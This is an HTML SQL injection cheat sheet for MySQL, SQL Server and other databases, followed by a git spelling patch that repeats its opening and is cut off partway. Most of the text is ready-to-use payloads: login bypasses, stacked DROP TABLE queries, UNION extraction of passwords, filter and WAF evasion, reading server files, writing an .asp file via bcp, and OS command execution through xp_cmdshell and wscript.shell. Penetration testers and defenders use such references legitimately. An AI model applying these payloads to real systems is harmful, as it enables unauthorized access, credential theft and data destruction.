Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members </code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
 
 <p>OPENROWSET (Transact-SQL)  - <a href="http://msdn2.microsoft.com/en-us/library/ms190312.aspx">http://msdn2.microsoft.com/en-us/library/ms190312.aspx</a></p>
 

From d8900588896b18bf007a3c7dc2dc3fade09eb7d2 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:34 -0400
Subject: [PATCH 51/59] spelling: situations

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index 9f5507d9..e89f7226 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -43,7 +43,7 @@ <h1><a href="/sql-injection-cheatsheet-oku/">SQL Injection Cheat Sheet</a></h1>
         <a href="/tag/sql+injection/" class="tag">sql injection</a>, <a href="/tag/security/" class="tag">security</a>, <a href="/tag/web+application+security/" class="tag">web application security</a>, <a href="/tag/web+uygulamasi+guvenligi/" class="tag">web uygulamasi guvenligi</a>, <a href="/tag/english/" class="tag">english</a>,  <span class="date">15.03.2007</span>
     </div>
 <!--<div style="float:right"><script type="text/javascript" src="http://yakutum.pasaj.com/widgetjs"></script></div>-->
-    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" 